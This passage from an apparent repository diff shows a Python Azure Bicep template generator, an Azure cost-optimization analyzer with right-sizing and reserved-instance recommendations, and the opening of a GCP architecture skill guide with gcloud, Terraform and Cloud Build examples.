properties: { publicAccess: 'None' }
}
resource curatedContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
name: '${dataLake.name}/default/curated'
properties: { publicAccess: 'None' }
}
// ---------------------------------------------------------------------------
// Event Hubs
// ---------------------------------------------------------------------------
resource eventHubNamespace 'Microsoft.EventHub/namespaces@2023-01-01-preview' = {
name: '${environment}-${appName}-eh'
location: location
sku: {
name: 'Standard'
tier: 'Standard'
capacity: environment == 'production' ? 2 : 1
}
properties: {
minimumTlsVersion: '1.2'
}
tags: {
environment: environment
'app-name': appName
}
}
resource eventHub 'Microsoft.EventHub/namespaces/eventhubs@2023-01-01-preview' = {
parent: eventHubNamespace
name: 'ingest'
properties: {
partitionCount: environment == 'production' ? 8 : 2
messageRetentionInDays: 7
}
}
resource consumerGroup 'Microsoft.EventHub/namespaces/eventhubs/consumergroups@2023-01-01-preview' = {
parent: eventHub
name: 'processing'
}
// ---------------------------------------------------------------------------
// Synapse Analytics (Serverless SQL)
// ---------------------------------------------------------------------------
resource synapse 'Microsoft.Synapse/workspaces@2021-06-01' = {
name: '${environment}-${appName}-syn'
location: location
identity: { type: 'SystemAssigned' }
properties: {
defaultDataLakeStorage: {
accountUrl: 'https://${dataLake.name}.dfs.core.windows.net'
filesystem: 'curated'
}
sqlAdministratorLogin: 'sqladmin'
sqlAdministratorLoginPassword: 'REPLACE_WITH_KEYVAULT_REFERENCE'
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
name: '${environment}-${appName}-logs'
location: location
properties: {
sku: { name: 'PerGB2018' }
retentionInDays: 30
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output dataLakeEndpoint string = 'https://${dataLake.name}.dfs.core.windows.net'
output eventHubNamespace string = eventHubNamespace.name
output synapseEndpoint string = synapse.properties.connectivityEndpoints.sql
"""
# Registry mapping each supported --arch-type value to its zero-argument
# template factory.  (NOTE(review): the annotation uses the builtin
# `callable`; `Callable[[], str]` would be more precise if typing.Callable
# is imported at the top of the file.)
TEMPLATES: Dict[str, callable] = {
    "web-app": _web_app_template,
    "microservices": _microservices_template,
    "serverless": _serverless_template,
    "data-pipeline": _data_pipeline_template,
}

# One-line summaries shown in CLI output and in the --json metadata.
TEMPLATE_DESCRIPTIONS = {
    "web-app": "App Service + Azure SQL + Front Door + Key Vault + Application Insights",
    "microservices": "AKS + API Management + Cosmos DB + Service Bus + Key Vault",
    "serverless": "Azure Functions + Event Grid + Service Bus + Cosmos DB",
    "data-pipeline": "Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions",
}
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """CLI entry point: generate a Bicep template for the chosen pattern.

    Emits the template to stdout by default, to a file with ``--output``,
    or as JSON metadata with ``--json``.
    """
    parser = argparse.ArgumentParser(
        description="Azure Bicep Generator — generate Bicep IaC templates for common Azure architecture patterns.",
        epilog="Examples:\n"
               "  python bicep_generator.py --arch-type web-app\n"
               "  python bicep_generator.py --arch-type microservices --output main.bicep\n"
               "  python bicep_generator.py --arch-type serverless --json",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--arch-type",
        required=True,
        choices=list(TEMPLATES.keys()),
        help="Architecture pattern type",
    )
    parser.add_argument(
        "--output",
        type=str,
        default=None,
        help="Write Bicep to file instead of stdout",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output metadata as JSON (template content + description)",
    )
    args = parser.parse_args()

    bicep_content = TEMPLATES[args.arch_type]()
    # Count lines once with splitlines() instead of the previous
    # duplicated split("\n") / split(chr(10)) computations.
    line_count = len(bicep_content.strip().splitlines())

    if args.json_output:
        result = {
            "arch_type": args.arch_type,
            "description": TEMPLATE_DESCRIPTIONS[args.arch_type],
            "bicep_template": bicep_content,
            "lines": line_count,
        }
        print(json.dumps(result, indent=2))
    elif args.output:
        # Explicit encoding so the template bytes are identical across platforms.
        with open(args.output, "w", encoding="utf-8") as f:
            f.write(bicep_content)
        print(f"Bicep template written to {args.output} ({line_count} lines)")
        print(f"Pattern: {TEMPLATE_DESCRIPTIONS[args.arch_type]}")
        print("\nNext steps:")
        print(f"  1. az bicep build --file {args.output}")
        print(f"  2. az deployment group validate --resource-group <rg> --template-file {args.output}")
        print(f"  3. az deployment group create --resource-group <rg> --template-file {args.output}")
    else:
        print(bicep_content)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,492 @@
#!/usr/bin/env python3
"""
Azure cost optimization analyzer.
Analyzes Azure resource configurations and provides cost-saving recommendations.
Usage:
python cost_optimizer.py --config resources.json
python cost_optimizer.py --config resources.json --json
python cost_optimizer.py --help
Expected JSON config format:
{
"virtual_machines": [
{"name": "vm-web-01", "size": "Standard_D4s_v5", "cpu_utilization": 12, "pricing": "on-demand", "monthly_cost": 140}
],
"sql_databases": [
{"name": "sqldb-main", "tier": "GeneralPurpose", "vcores": 8, "utilization": 25, "monthly_cost": 400}
],
"storage_accounts": [
{"name": "stmyapp", "size_gb": 500, "tier": "Hot", "has_lifecycle_policy": false}
],
"aks_clusters": [
{"name": "aks-prod", "node_count": 6, "node_size": "Standard_D4s_v5", "avg_cpu_utilization": 35, "monthly_cost": 800}
],
"cosmos_db": [
{"name": "cosmos-orders", "ru_provisioned": 10000, "ru_used_avg": 2000, "monthly_cost": 580}
],
"public_ips": [
{"name": "pip-unused", "attached": false}
],
"app_services": [
{"name": "app-web", "tier": "PremiumV3", "instance_count": 3, "cpu_utilization": 15, "monthly_cost": 300}
],
"has_budget_alerts": false,
"has_advisor_enabled": false
}
"""
import argparse
import json
import sys
from typing import Dict, List, Any
class AzureCostOptimizer:
    """Analyze an Azure resource inventory and recommend cost savings.

    ``resources`` follows the JSON schema documented in the module
    docstring; every key is optional.  Each ``_analyze_*`` pass appends
    recommendation dicts (service, type, issue, recommendation,
    potential_savings_usd, priority) to ``self.recommendations`` and
    returns its estimated monthly savings in USD.
    """

    def __init__(self, resources: Dict[str, Any]):
        self.resources = resources
        # Populated by analyze(); reset on every call.
        self.recommendations: List[Dict[str, Any]] = []

    def analyze(self) -> Dict[str, Any]:
        """Run all analysis passes and return the full report dict."""
        self.recommendations = []
        total_savings = 0.0
        total_savings += self._analyze_virtual_machines()
        total_savings += self._analyze_sql_databases()
        total_savings += self._analyze_storage()
        total_savings += self._analyze_aks()
        total_savings += self._analyze_cosmos_db()
        total_savings += self._analyze_app_services()
        total_savings += self._analyze_networking()
        total_savings += self._analyze_general()
        current_spend = self._estimate_current_spend()
        return {
            "current_monthly_usd": round(current_spend, 2),
            "potential_monthly_savings_usd": round(total_savings, 2),
            "optimized_monthly_usd": round(current_spend - total_savings, 2),
            "savings_percentage": round((total_savings / current_spend) * 100, 2) if current_spend > 0 else 0,
            "recommendations": self.recommendations,
            "priority_actions": self._top_priority(),
        }

    # ------------------------------------------------------------------
    # Analysis passes
    # ------------------------------------------------------------------
    def _analyze_virtual_machines(self) -> float:
        """Flag idle / under-utilized VMs, RI candidates, and spot candidates."""
        savings = 0.0
        vms = self.resources.get("virtual_machines", [])
        for vm in vms:
            cost = vm.get("monthly_cost", 140)
            cpu = vm.get("cpu_utilization", 100)
            pricing = vm.get("pricing", "on-demand")
            # Idle VMs: effectively unused — deallocating saves ~90%.
            if cpu < 5:
                savings += cost * 0.9
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Idle Resource",
                    "issue": f"VM {vm.get('name', '?')} has <5% CPU utilization",
                    "recommendation": "Deallocate or delete the VM. Use Azure Automation auto-shutdown for dev/test VMs.",
                    "potential_savings_usd": round(cost * 0.9, 2),
                    "priority": "high",
                })
            elif cpu < 20:
                savings += cost * 0.4
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Right-sizing",
                    "issue": f"VM {vm.get('name', '?')} is under-utilized ({cpu}% CPU)",
                    "recommendation": "Downsize to a smaller SKU. Use Azure Advisor right-sizing recommendations.",
                    "potential_savings_usd": round(cost * 0.4, 2),
                    "priority": "high",
                })
            # Reserved Instances: steady utilization on on-demand pricing.
            if pricing == "on-demand" and cpu >= 20:
                ri_savings = cost * 0.35
                savings += ri_savings
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Reserved Instances",
                    "issue": f"VM {vm.get('name', '?')} runs on-demand with steady utilization",
                    "recommendation": "Purchase 1-year Reserved Instance (up to 35% savings) or 3-year (up to 55% savings).",
                    "potential_savings_usd": round(ri_savings, 2),
                    "priority": "medium",
                })
        # Spot VMs for batch/fault-tolerant workloads (workload_type tag).
        spot_candidates = [vm for vm in vms if vm.get("workload_type") in ("batch", "dev", "test")]
        if spot_candidates:
            spot_savings = sum(vm.get("monthly_cost", 100) * 0.6 for vm in spot_candidates)
            savings += spot_savings
            self.recommendations.append({
                "service": "Virtual Machines",
                "type": "Spot VMs",
                "issue": f"{len(spot_candidates)} VMs running batch/dev/test workloads on regular instances",
                "recommendation": "Switch to Azure Spot VMs for up to 90% savings on interruptible workloads.",
                "potential_savings_usd": round(spot_savings, 2),
                "priority": "medium",
            })
        return savings

    def _analyze_sql_databases(self) -> float:
        """Flag idle databases, serverless-tier candidates, and oversized vCores."""
        savings = 0.0
        dbs = self.resources.get("sql_databases", [])
        for db in dbs:
            cost = db.get("monthly_cost", 200)
            utilization = db.get("utilization", 100)
            vcores = db.get("vcores", 2)
            tier = db.get("tier", "GeneralPurpose")
            # Idle databases: barely any connections.
            if db.get("connections_per_day", 1000) < 10:
                savings += cost * 0.8
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Idle Resource",
                    "issue": f"Database {db.get('name', '?')} has <10 connections/day",
                    "recommendation": "Delete unused database or switch to serverless tier with auto-pause.",
                    "potential_savings_usd": round(cost * 0.8, 2),
                    "priority": "high",
                })
            # Serverless opportunity: low utilization on provisioned compute.
            elif utilization < 30 and tier == "GeneralPurpose":
                serverless_savings = cost * 0.45
                savings += serverless_savings
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Serverless Migration",
                    "issue": f"Database {db.get('name', '?')} has low utilization ({utilization}%) on provisioned tier",
                    "recommendation": "Switch to Azure SQL Serverless tier with auto-pause (60-min delay). Pay only for active compute.",
                    "potential_savings_usd": round(serverless_savings, 2),
                    "priority": "high",
                })
            # Right-sizing: more vCores than the workload needs.
            elif utilization < 50 and vcores > 2:
                right_size_savings = cost * 0.3
                savings += right_size_savings
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Right-sizing",
                    "issue": f"Database {db.get('name', '?')} uses {vcores} vCores at {utilization}% utilization",
                    "recommendation": f"Reduce to {max(2, vcores // 2)} vCores. Monitor DTU/vCore usage after change.",
                    "potential_savings_usd": round(right_size_savings, 2),
                    "priority": "medium",
                })
        return savings

    def _analyze_storage(self) -> float:
        """Flag missing lifecycle policies and Hot-tier data that could move tiers."""
        savings = 0.0
        accounts = self.resources.get("storage_accounts", [])
        for acct in accounts:
            size_gb = acct.get("size_gb", 0)
            tier = acct.get("tier", "Hot")
            # Lifecycle policy missing on a non-trivial account.
            if not acct.get("has_lifecycle_policy", False) and size_gb > 50:
                lifecycle_savings = size_gb * 0.01  # ~$0.01/GB moving hot to cool
                savings += lifecycle_savings
                self.recommendations.append({
                    "service": "Blob Storage",
                    "type": "Lifecycle Policy",
                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) has no lifecycle policy",
                    "recommendation": "Add lifecycle management: move to Cool after 30 days, Archive after 90 days.",
                    "potential_savings_usd": round(lifecycle_savings, 2),
                    "priority": "medium",
                })
            # Hot tier for large, infrequently accessed data.
            if tier == "Hot" and size_gb > 500:
                tier_savings = size_gb * 0.008
                savings += tier_savings
                self.recommendations.append({
                    "service": "Blob Storage",
                    "type": "Storage Tier",
                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) on Hot tier",
                    "recommendation": "Evaluate Cool or Cold tier for infrequently accessed data. Hot=$0.018/GB, Cool=$0.01/GB, Cold=$0.0036/GB.",
                    "potential_savings_usd": round(tier_savings, 2),
                    "priority": "high",
                })
        return savings

    def _analyze_aks(self) -> float:
        """Flag over-provisioned clusters and missing spot node pools."""
        savings = 0.0
        clusters = self.resources.get("aks_clusters", [])
        for cluster in clusters:
            cost = cluster.get("monthly_cost", 500)
            cpu = cluster.get("avg_cpu_utilization", 100)
            node_count = cluster.get("node_count", 3)
            # Over-provisioned cluster.
            if cpu < 30 and node_count > 3:
                aks_savings = cost * 0.3
                savings += aks_savings
                self.recommendations.append({
                    "service": "AKS",
                    "type": "Right-sizing",
                    "issue": f"Cluster {cluster.get('name', '?')} has {node_count} nodes at {cpu}% CPU",
                    "recommendation": "Enable cluster autoscaler. Set min nodes to 2 (or 1 for dev). Use node auto-provisioning.",
                    "potential_savings_usd": round(aks_savings, 2),
                    "priority": "high",
                })
            # Spot node pools for non-critical workloads.
            if not cluster.get("has_spot_pool", False):
                spot_savings = cost * 0.15
                savings += spot_savings
                self.recommendations.append({
                    "service": "AKS",
                    "type": "Spot Node Pools",
                    "issue": f"Cluster {cluster.get('name', '?')} has no spot node pools",
                    "recommendation": "Add a spot node pool for batch jobs, CI runners, and dev workloads (up to 90% savings).",
                    "potential_savings_usd": round(spot_savings, 2),
                    "priority": "medium",
                })
        return savings

    def _analyze_cosmos_db(self) -> float:
        """Flag over-provisioned RU/s; suggest autoscale or serverless mode."""
        savings = 0.0
        dbs = self.resources.get("cosmos_db", [])
        for db in dbs:
            cost = db.get("monthly_cost", 200)
            ru_provisioned = db.get("ru_provisioned", 400)
            ru_used = db.get("ru_used_avg", 400)
            # Massive over-provisioning (<20% of provisioned throughput used).
            if ru_provisioned > 0 and ru_used / ru_provisioned < 0.2:
                cosmos_savings = cost * 0.5
                savings += cosmos_savings
                self.recommendations.append({
                    "service": "Cosmos DB",
                    "type": "Right-sizing",
                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s ({int(ru_used/ru_provisioned*100)}% utilization)",
                    "recommendation": "Switch to autoscale throughput or serverless mode. Autoscale adjusts RU/s between 10%-100% of max.",
                    "potential_savings_usd": round(cosmos_savings, 2),
                    "priority": "high",
                })
            elif ru_provisioned > 0 and ru_used / ru_provisioned < 0.5:
                cosmos_savings = cost * 0.25
                savings += cosmos_savings
                self.recommendations.append({
                    "service": "Cosmos DB",
                    "type": "Autoscale",
                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s — variable workload",
                    "recommendation": "Enable autoscale throughput. Set max RU/s to current provisioned value.",
                    "potential_savings_usd": round(cosmos_savings, 2),
                    "priority": "medium",
                })
        return savings

    def _analyze_app_services(self) -> float:
        """Flag over-provisioned instances and Premium tiers in dev/test."""
        savings = 0.0
        apps = self.resources.get("app_services", [])
        for app in apps:
            cost = app.get("monthly_cost", 100)
            cpu = app.get("cpu_utilization", 100)
            instances = app.get("instance_count", 1)
            tier = app.get("tier", "Basic")
            # Over-provisioned instances.
            if cpu < 20 and instances > 1:
                app_savings = cost * 0.4
                savings += app_savings
                self.recommendations.append({
                    "service": "App Service",
                    "type": "Right-sizing",
                    "issue": f"App {app.get('name', '?')} runs {instances} instances at {cpu}% CPU",
                    "recommendation": "Reduce instance count or enable autoscale with min=1. Consider downgrading plan tier.",
                    "potential_savings_usd": round(app_savings, 2),
                    "priority": "high",
                })
            # Premium tier for dev/test environments.
            if tier in ("PremiumV3", "PremiumV2") and app.get("environment") in ("dev", "test"):
                tier_savings = cost * 0.5
                savings += tier_savings
                self.recommendations.append({
                    "service": "App Service",
                    "type": "Plan Tier",
                    "issue": f"App {app.get('name', '?')} uses {tier} in {app.get('environment', 'unknown')} environment",
                    "recommendation": "Use Basic (B1) or Free tier for dev/test environments.",
                    "potential_savings_usd": round(tier_savings, 2),
                    "priority": "high",
                })
        return savings

    def _analyze_networking(self) -> float:
        """Flag unattached public IPs and NAT Gateways in dev/test."""
        savings = 0.0
        # Unattached public IPs still accrue hourly charges.
        pips = self.resources.get("public_ips", [])
        unattached = [p for p in pips if not p.get("attached", True)]
        if unattached:
            pip_savings = len(unattached) * 3.65  # ~$0.005/hr = $3.65/month
            savings += pip_savings
            self.recommendations.append({
                "service": "Public IP",
                "type": "Unused Resource",
                "issue": f"{len(unattached)} unattached public IPs incurring hourly charges",
                "recommendation": "Delete unused public IPs. Unattached Standard SKU IPs cost ~$3.65/month each.",
                "potential_savings_usd": round(pip_savings, 2),
                "priority": "high",
            })
        # NAT Gateways in dev environments.
        nat_gateways = self.resources.get("nat_gateways", [])
        dev_nats = [n for n in nat_gateways if n.get("environment") in ("dev", "test")]
        if dev_nats:
            nat_savings = len(dev_nats) * 32  # ~$32/month per NAT Gateway
            savings += nat_savings
            self.recommendations.append({
                "service": "NAT Gateway",
                "type": "Environment Optimization",
                "issue": f"{len(dev_nats)} NAT Gateways in dev/test environments",
                "recommendation": "Remove NAT Gateways in dev/test. Use Azure Firewall or service tags for outbound instead.",
                "potential_savings_usd": round(nat_savings, 2),
                "priority": "medium",
            })
        return savings

    def _analyze_general(self) -> float:
        """Visibility checks (budget alerts, Advisor). These carry no direct savings."""
        savings = 0.0
        if not self.resources.get("has_budget_alerts", False):
            self.recommendations.append({
                "service": "Cost Management",
                "type": "Budget Alerts",
                "issue": "No budget alerts configured",
                "recommendation": "Create Azure Budget with alerts at 50%, 80%, and 100% of monthly target.",
                "potential_savings_usd": 0,
                "priority": "high",
            })
        # Fix: default to False (was True) so a missing key surfaces the
        # recommendation, consistent with the has_budget_alerts handling
        # above and with the documented config schema.
        if not self.resources.get("has_advisor_enabled", False):
            self.recommendations.append({
                "service": "Azure Advisor",
                "type": "Visibility",
                "issue": "Azure Advisor cost recommendations not reviewed",
                "recommendation": "Review Azure Advisor cost recommendations weekly. Enable Advisor alerts for new findings.",
                "potential_savings_usd": 0,
                "priority": "medium",
            })
        return savings

    # ------------------------------------------------------------------
    # Helpers
    # ------------------------------------------------------------------
    def _estimate_current_spend(self) -> float:
        """Sum reported monthly costs plus rough storage / public-IP estimates."""
        total = 0.0
        for key in ("virtual_machines", "sql_databases", "aks_clusters", "cosmos_db", "app_services"):
            for item in self.resources.get(key, []):
                total += item.get("monthly_cost", 0)
        # Storage estimate (Hot tier default pricing).
        for acct in self.resources.get("storage_accounts", []):
            total += acct.get("size_gb", 0) * 0.018
        # Every public IP accrues ~$3.65/month (was an unused-variable loop).
        total += 3.65 * len(self.resources.get("public_ips", []))
        return total if total > 0 else 1000  # Default if no cost data

    def _top_priority(self) -> List[Dict[str, Any]]:
        """Return up to five high-priority recommendations, largest savings first."""
        high = [r for r in self.recommendations if r["priority"] == "high"]
        high.sort(key=lambda x: x.get("potential_savings_usd", 0), reverse=True)
        return high[:5]
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def _format_text(report: Dict[str, Any]) -> str:
    """Render an analysis report as human-readable text.

    Args:
        report: Dict produced by the optimizer's ``analyze()``; expected
            keys include the spend/savings figures plus the
            ``priority_actions`` and ``recommendations`` lists.

    Returns:
        A multi-line string summarizing spend, priority actions, and all
        recommendations.
    """
    lines = []
    lines.append(f"Current Monthly Spend: ${report['current_monthly_usd']}")
    lines.append(f"Potential Savings: ${report['potential_monthly_savings_usd']} ({report['savings_percentage']}%)")
    lines.append(f"Optimized Spend: ${report['optimized_monthly_usd']}")
    lines.append("")
    lines.append("=== Priority Actions ===")
    for i, action in enumerate(report.get("priority_actions", []), 1):
        lines.append(f" {i}. [{action['service']}] {action['recommendation']}")
        lines.append(f" Savings: ${action.get('potential_savings_usd', 0)}")
    lines.append("")
    lines.append("=== All Recommendations ===")
    for rec in report.get("recommendations", []):
        # Fix: service and type were concatenated with no separator,
        # rendering e.g. "Virtual MachinesRight-sizing".
        lines.append(f" [{rec['priority'].upper()}] {rec['service']} — {rec['type']}")
        lines.append(f" Issue: {rec['issue']}")
        lines.append(f" Action: {rec['recommendation']}")
        savings = rec.get("potential_savings_usd", 0)
        if savings:
            lines.append(f" Savings: ${savings}")
        lines.append("")
    return "\n".join(lines)
def main():
    """CLI entry point: parse arguments, load the inventory, print a report."""
    parser = argparse.ArgumentParser(
        description="Azure Cost Optimizer — analyze Azure resources and recommend cost savings.",
        epilog="Examples:\n"
        " python cost_optimizer.py --config resources.json\n"
        " python cost_optimizer.py --config resources.json --json",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--config",
        required=True,
        help="Path to JSON file with current Azure resource inventory",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output as JSON instead of human-readable text",
    )
    cli_args = parser.parse_args()

    # Load the resource inventory, exiting with a clear message on failure.
    try:
        with open(cli_args.config, "r") as fh:
            inventory = json.load(fh)
    except FileNotFoundError:
        print(f"Error: file not found: {cli_args.config}", file=sys.stderr)
        sys.exit(1)
    except json.JSONDecodeError as err:
        print(f"Error: invalid JSON in {cli_args.config}: {err}", file=sys.stderr)
        sys.exit(1)

    report = AzureCostOptimizer(inventory).analyze()
    output = json.dumps(report, indent=2) if cli_args.json_output else _format_text(report)
    print(output)
# Allow the module to be executed directly as a command-line script.
if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,444 @@
---
name: "gcp-cloud-architect"
description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization."
---
# GCP Cloud Architect
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and GCP experience level
- Compliance requirements (GDPR, HIPAA, SOC 2)
- Availability requirements (SLA, RPO/RTO)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py --input requirements.json
```
**Example output:**
```json
{
"recommended_pattern": "serverless_web",
"service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"],
"estimated_monthly_cost_usd": 30,
"pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"],
"cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"]
}
```
Select from recommended patterns:
- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore
- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub
- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker
- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Estimate Cost
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" },
{ "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" }
],
"total_potential_savings_usd": 745
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Committed use discount opportunities
- Sustained use discount analysis
- Potential monthly savings
Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates.
### Step 4: Generate IaC
Create infrastructure-as-code for the selected pattern:
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Example Terraform HCL output (Cloud Run + Firestore):**
```hcl
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
description = "GCP project ID"
type = string
}
variable "region" {
description = "GCP region"
type = string
default = "us-central1"
}
variable "app_name" {
  description = "Application name"
  type        = string
}
variable "environment" {
  description = "Deployment environment (e.g. dev, staging, prod)"
  type        = string
}
resource "google_cloud_run_v2_service" "api" {
name = "${var.environment}-${var.app_name}-api"
location = var.region
template {
containers {
image = "gcr.io/${var.project_id}/${var.app_name}:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
env {
name = "FIRESTORE_PROJECT"
value = var.project_id
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
resource "google_firestore_database" "default" {
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
}
```
**Example gcloud CLI deployment:**
```bash
# Deploy Cloud Run service
gcloud run deploy my-app-api \
--image gcr.io/$PROJECT_ID/my-app:latest \
--region us-central1 \
--platform managed \
--allow-unauthenticated \
--memory 512Mi \
--cpu 1 \
--min-instances 0 \
--max-instances 10
# Create Firestore database
gcloud firestore databases create --location=us-central1
```
> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`.
### Step 5: Configure CI/CD
Set up automated deployment with Cloud Build or GitHub Actions:
```yaml
# cloudbuild.yaml
steps:
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.']
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA']
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args:
- 'run'
- 'deploy'
- 'my-app-api'
- '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
- '--region=us-central1'
- '--platform=managed'
images:
- 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
```
```bash
# Connect repo and create trigger
gcloud builds triggers create github \
--repo-name=my-app \
--repo-owner=my-org \
--branch-pattern="^main$" \
--build-config=cloudbuild.yaml
```
### Step 6: Security Review
Verify security configuration:
```bash
# Review IAM bindings
gcloud projects get-iam-policy $PROJECT_ID --format=json
# Check service account permissions
gcloud iam service-accounts list --project=$PROJECT_ID
# Verify VPC Service Controls (if applicable)
gcloud access-context-manager perimeters list --policy=$POLICY_ID
```
**Security checklist:**
- IAM roles follow least privilege (prefer predefined roles over basic roles)
- Service accounts use Workload Identity for GKE
- VPC Service Controls configured for sensitive APIs
- Cloud KMS encryption keys for customer-managed encryption
- Cloud Audit Logs enabled for all admin activity
- Organization policies restrict public access
- Secret Manager used for all credentials
**If deployment fails:**
1. Check the failure reason:
```bash
gcloud run services describe my-app-api --region us-central1
gcloud logging read "resource.type=cloud_run_revision" --limit=20
```
2. Review Cloud Logging for application errors.
3. Fix the configuration or container image.
4. Redeploy:
```bash
gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1
```
**Common failure causes:**
- IAM permission errors -- verify service account roles and `--allow-unauthenticated` flag
- Quota exceeded -- request quota increase via IAM & Admin > Quotas
- Container startup failure -- check container logs and health check configuration
- Required APIs not enabled -- enable them with `gcloud services enable`
---
## Tools
### architecture_designer.py
Recommends GCP services based on workload requirements.
```bash
python scripts/architecture_designer.py --input requirements.json --output design.json
```
**Input:** JSON with app type, scale, budget, compliance needs
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes GCP resources for cost savings.
```bash
python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000
```
**Output:** Recommendations for:
- Idle resource removal
- Machine type right-sizing
- Committed use discounts
- Storage class transitions
- Network egress optimization
### deployment_manager.py
Generates gcloud CLI deployment scripts and Terraform configurations.
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Output:** Production-ready deployment scripts with:
- Cloud Run or GKE deployment
- Firestore or Cloud SQL setup
- Identity Platform configuration
- IAM roles with least privilege
- Cloud Monitoring and Logging
---
## Quick Start
### Web App on Cloud Run (< $100/month)
```
Ask: "Design a serverless web backend for a mobile app with 1000 users"
Result:
- Cloud Run for API (auto-scaling, no cold start with min instances)
- Firestore for data (pay-per-operation)
- Identity Platform for authentication
- Cloud Storage + Cloud CDN for static assets
- Estimated: $15-40/month
```
### Microservices on GKE ($500-2000/month)
```
Ask: "Design a scalable architecture for a SaaS platform with 50k users"
Result:
- GKE Autopilot for containerized workloads
- Cloud SQL (PostgreSQL) with read replicas
- Memorystore (Redis) for session caching
- Cloud CDN for global delivery
- Cloud Build for CI/CD
- Multi-zone deployment
```
### Serverless Data Pipeline
```
Ask: "Design a real-time analytics pipeline for event data"
Result:
- Pub/Sub for event ingestion
- Dataflow (Apache Beam) for stream processing
- BigQuery for analytics and warehousing
- Looker for dashboards
- Cloud Functions for lightweight transforms
```
### ML Platform
```
Ask: "Design a machine learning platform for model training and serving"
Result:
- Vertex AI for training and prediction
- Cloud Storage for datasets and model artifacts
- BigQuery for feature store
- Cloud Functions for preprocessing triggers
- Cloud Monitoring for model drift detection
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly GCP limit | $500/month max |
| Team context | Size, GCP experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
